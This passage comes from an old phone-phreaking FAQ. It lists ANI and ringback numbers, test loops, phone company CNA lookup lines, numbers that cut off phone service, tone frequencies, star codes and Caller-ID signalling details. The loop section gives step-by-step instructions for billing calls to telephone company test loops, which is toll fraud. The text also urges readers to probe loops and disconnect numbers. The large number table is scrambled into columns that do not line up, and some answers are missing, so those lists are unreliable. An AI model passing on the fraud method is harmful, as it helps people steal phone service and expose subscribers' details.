205  300-648-1111    Dora, AL
205  300-765-4321    Bessemer, AL
205  300-798-1111    Forestdale, AL
205  300-833-3333    Birmingham
205  557-2311        Birmingham, AL
205  811             Pell City/Cropwell/Lincoln, AL
205  841-1111        Tarrant, AL
205  908-222-2222    Birmingham, AL
206  411             WA (Not US West)
207  958             ME
209  830-2121        Stockton, CA
209  211-9779        Stockton, CA
212  958             Manhattan, NY
213  114             Los Angeles, CA (GTE)
213  1223            Los Angeles, CA (Some 1AESS switches)
213  211-2345        Los Angeles, CA (English response)
213  211-2346        Los Angeles, CA (DTMF response)
213  760-2???        Los Angeles, CA (DMS switches)
213  61056           Los Angeles, CA
214  570             Dallas, TX
214  790             Dallas, TX (GTE)
214  970-222-2222    Dallas, TX
214  970-611-1111    Dallas, TX (Southwestern Bell)
215  410-xxxx        Philadelphia, PA
215  511             Philadelphia, PA
215  958             Philadelphia, PA
216  331             Akron/Canton/Cleveland/Lorain/Youngstown, OH
216  959-9892        Akron/Canton/Cleveland/Lorain/Youngstown, OH
217  200-xxx-xxxx    Champaign-Urbana/Springfield, IL
219  550             Gary/Hammond/Michigan City/Southbend, IN
N N N N N N N N N
N N
219 301 310 310 310 310 312 312 312 312 313 313 313 313 314 315 315 315 317 317
317 401 401 402 404 404 404 405 405 407 408 408 408 409 409 410 410 410 412 412
412 413 413 414 415 415 415 415 415 415 419 502 502 503 503 504 504 504
559 958-9968 114 1223 211-2345 211-2346 200 290 1-200-8825 1-200-555-1212 200-200-
2002 200-222-2222 200-xxx-xxxx 200200200200200 410-xxxx# 953 958 998 310-222-2222
559-222-2222 743-1218 200-200-4444 222-2222 311 311 940-xxx-xxxx 990 890-7777777
897 200-222-2222 300-xxx-xxxx 760 940 951 970-xxxx 200-6969 200-555-1212 811 711-
6633 711-4411 999-xxxx 958 200-555-5555 330-2234 200-555-1212 211-2111 2222 640
760-2878 7600-2222 311 2002222222 997-555-1212 611 999 99882233 201-269-1111 998
N N N N N N
504 508 508 508 508 509 512 512 515 515 516 516 517 517 518 518 603 606 606 607
609 610 612 614 614 615 615 615 616 617 617 617 617 617 618 618 619 703 704 708
708 708 708 708 713 713 713 714 714 714 716 716 717 718 802 802 802 802
99851-0000000000 958 200-222-1234 200-222-2222 26011 560 830 970-xxxx 5463 811 958
968 200-222-2222 200200200200200 997 998 200-222-2222 997-555-1212 711 993 958 958
511 200 571 200200200200200 2002222222 830 200-222-2222 200-222-1234 200-222-2222
200-444-4444 220-2622 958 200-xxx-xxxx 930 211-2001 811 311 1-200-555-1212 1-200-
8825 200-6153 724-9951 356-9646 380 970-xxxx 811 114 211-2121 211-2222 511 990 958
958 2-222-222-2222 200-222-2222 1-700-222-2222 111-2222
Canada: 204 644-xxxx 306 115 403 311 403 908-222-2222 403 999 416 997-xxxx N 506
1-555-1313 514 320-xxxx 519 320-xxxx 604 1116 604 1211 604 211 613 320-2232 705
320-4567 Australia: +61 03-552-4111 +612 19123 United Kingdom: 175

12. What is a ringback number?

A ringback number is a number that you call that will immediately ring the
telephone from which it was called. In most instances you must call the
ringback number, quickly hang up the phone for just a short moment and then let
up on the switch. You will then go back off hook and hear a different tone. You
may then hang up. You will be called back seconds later.

13. What is the ringback number for my area?

An 'x' means insert those numbers from the phone number from which you are
calling. A '?' means that the number varies from switch to switch in the area,
or changes from time to time. Try all possible combinations. If the ringback
for your NPA is not listed, try common ones such as 954, 957 and 958. Also, try
using the numbers listed for
other NPA's served by your telephone company.

14. What is a loop?

This FAQ answer is
excerpted from: ToneLoc v0.99 User Manual by Minor Threat & Mucho Maas

Loops are a pair of phone numbers, usually consecutive, like 836-9998 and
836-9999. They are used by the phone company for testing. What good do loops do
us? Well, they are cool in a few ways. Here is a simple use of loops. Each loop
has two ends, a 'high' end, and a 'low' end. One end gives a (usually)
constant, loud tone when it is called. The other end is silent. Loops don't
usually ring either. When BOTH ends are called, the people that called each end
can talk through the loop. Some loops are voice filtered and won't pass
anything but a constant tone; these aren't much use to you. Here's what you can
use working loops for: billing phone calls! First, call the end that gives the
loud tone. Then if the operator or someone calls the other end, the tone will
go quiet. Act like the phone just rang and you answered it ... say "Hello",
"Allo", "Chow", "Yo", or what the fuck ever. The operator thinks that she just
called you, and that's it! Now the phone bill will go to the loop, and your
local RBOC will get the bill! Use this technique in moderation, or the loop may
go down. Loops are probably most useful when you want to talk to someone to
whom you don't want to give your phone number.

15. What is a loop in my area?

Many of these loops are no longer functional. If you are local to any of these
loops, please try them out and e-mail
me the results of your research.

16. What is a CNA number?

CNA stands for Customer Name and Address. The CNA number is a phone number for
telephone company personnel to call and get the name and address for a phone
number. If a telephone lineman finds a phone line he does not recognize, he can
use the ANI number to find its phone number and then call the CNA operator to
see who owns it and where they live.

Normal CNA numbers are available only to telephone company personnel. Private
citizens may legally get CNA information from private companies. Two such
companies are:

    Unidirectory    (900)933-3330
    Telename        (900)884-1212

Note that these are 900 numbers, and will cost you approximately one dollar per
minute.

If you are in 312 or 708, AmeriTech has a pay-for-play CNA service available to
the general public. The number is 796-9600. The cost is $.35/call and can look
up two numbers per call.

If you are in 415, Pacific Bell offers a public access CNA service at
(415)781-5271.

17. What is the telephone company CNA number for my area?

203   (203)771-8080   CT
513   (513)397-9110   Cincinnati/Dayton, OH
516   (516)321-5700   Hempstead/Long Island, NY
518   (518)471-8111   Albany/Schenectady/Troy, NY
614   (614)464-0123   Columbus/Steubenville, OH
813   (813)270-8711   Ft. Meyers/St. Petersburg/Tampa, FL

18. What are some numbers that always ring busy?

216   xxx-9887   Akron/Canton/Cleveland/Lorain/Youngstown, OH
303   431-0000   Denver, CO
303   866-8660   Denver, CO
316   952-7265   Dodge City/Wichita, KS
501   377-99xx   AR
719   472-3773   Colorado Springs/Leadville/Pueblo, CO
805   255-0699   Bakersfield/Santa Barbara, CA
818   885-0699   Pasadena, CA
906   632-9999   Marquette/Sault Ste. Marie, MI
906   635-9999   Marquette/Sault Ste. Marie, MI
914   576-9903   Peekskill/Poughkeepsie/White Plains/Yonkers, NY

19. What are some numbers that temporarily disconnect phone service?

314   511          Columbia/Jefferson City/St.Louis, MO (1 minute)
404   420          Atlanta, GA (5 minutes)
405   953          Enid/Oklahoma City, OK (1 minute)
407   511          Orlando/West Palm Beach, FL (1 minute)
512   200          Austin/Corpus Christi, TX (1 minute)
516   480          Hempstead/Long Island, NY (1 minute)
603   980          NH
614   xxx-9894     Columbus/Steubenville, OH
805   119          Bakersfield/Santa Barbara, CA (3 minutes)
919   211 or 511   Durham, NC (10 min - 1 hour)

24. What are the frequencies of the telephone tones?

Type                Hz            On    Off
---------------------------------------------
Dial Tone           350 & 400     --    --
Busy Signal         480 & 620     0.5   0.5
Toll Congestion     480 & 620     0.2   0.3
Ringback (Normal)   440 & 480     2.0   4.0
Ringback (PBX)      440 & 480     1.5   4.5
Reorder (Local)     480 & 620     3.0   2.0
Invalid Number      200 & 400
Hang Up Warning     1400 & 2060   0.1   0.1
Hang Up             2450 & 2600   --    --

25. What are all of the * (LASS) codes?

Local Area Signalling Services (LASS) and Custom Calling Feature Control Codes:

(These appear to be standard, but may be changed locally)

Service                       Tone         Pulse/rotary   Notes
-------------------------------------------------------------------------
Assistance/Police             *12          n/a            [1]
Cancel forwarding             *30          n/a            [C1]
Automatic Forwarding          *31          n/a            [C1]
Notify                        *32          n/a            [C1] [2]
Intercom Ring 1 (..)          *51          1151           [3]
Intercom Ring 2 (.._)         *52          1152           [3]
Intercom Ring 3 (._.)         *53          1153           [3]
Extension Hold                *54          1154           [3]
Customer Originated Trace     *57          1157
Selective Call Rejection      *60          1160
  (or Call Screen)
Selective Distinct Alert      *61          1161
Selective Call Acceptance     *62          1162
Selective Call Forwarding     *63          1163
ICLID Activation              *65          1165
Call Return (outgoing)        *66          1166
Number Display Blocking       *67          1167           [4]
Computer Access Restriction   *68          1168
Call Return (incoming)        *69          1169
Call Waiting disable          *70          1170           [4]
No Answer Call Transfer       *71          1171
Usage Sensitive 3 way call    *71          1171
Call Forwarding: start        *72 or 72#   1172
Call Forwarding: cancel       *73 or 73#   1173
Speed Calling (8 numbers)     *74 or 74#   1174
Speed Calling (30 numbers)    *75 or 75#   1175
Anonymous Call Rejection      *77          1177           [5] [M: *58]
Call Screen Disable           *80          1160           (or Call Screen) [M: *50]
Selective Distinct Disable    *81          1161           [M: *51]
Select. Acceptance Disable    *82          1162
Select. Forwarding Disable    *83          1163           [M: *53]
ICLID Disable
Call Return (cancel out)
Anon. Call Reject (cancel)
Call Return (cancel in)

Notes:

[C1]      - Means code used for Cellular One service
[1]       - for cellular in Pittsburgh, PA A/C 412 in some areas
[2]       - indicates that you are not local and maybe how to reach you
[3]       - found in Pac Bell territory; Intercom ring causes a distinctive
            ring to be generated on the current line; Hold keeps a call
            connected until another extension is picked up
[4]       - applied once before each call
[5]       - A.C.R. blocks calls from those who blocked Caller ID
            (used in C&P territory, for instance)
          - cancels further return attempts
[M: *xx]  - alternate code used for MLVP (multi-line variety package) by
            Bellcore. It goes by different names in different RBOCs. In
            Bellsouth it is called Prestige. It is an arrangement of ESSEX
            like features for single or small multiple line groups. The
            reason for different codes for some features in MLVP is that
            call-pickup is *8 in MLVP so all *8x codes are reassigned *5x

26. What frequencies do cordless phones operate on?

Here are the frequencies for the first generation 46/49mhz phones. The new
900mhz cordless phones are not covered.

Channel   Handset Transmit   Base Transmit
-------   ----------------   -------------
   1      49.670mhz          46.610mhz
   2      49.845             46.630
   3      49.860             46.670
   4      49.770             46.710
   5      49.875             46.730
   6      49.830             46.770
   7      49.890             46.830
   8      49.930             46.870
   9      49.990             46.930
  10      49.970             46.970

27. What is Caller-ID?

This FAQ answer is stolen from Rockwell:

Calling Number Delivery (CND), better known as Caller ID, is a telephone
service intended for residential and small business customers. It allows the
called Customer Premises Equipment (CPE) to receive a calling party's directory
number and the date and time of the call during the first 4 second silent
interval in the ringing cycle.

Parameters
~~~~~~~~~~
The data signalling interface has the following characteristics:

    Link Type:             2-wire, simplex
    Transmission Scheme:   Analog, phase-coherent FSK
    Logical 1 (mark):      1200 +/- 12 Hz
    Logical 0 (space):     2200 +/- 22 Hz
    Transmission Rate:     1200 bps
    Transmission Level:    13.5 +/- dBm into 900 ohm load

Protocol
~~~~~~~~
The protocol uses 8-bit data words (bytes), each bounded by a start bit and a
stop bit. The CND message uses the Single Data Message format shown below.

| Channel | Carrier | Message | Message |  Data   | Checksum |
| Seizure | Signal  |  Type   | Length  | Word(s) |   Word   |
| Signal  |         |  Word   |  Word   |         |          |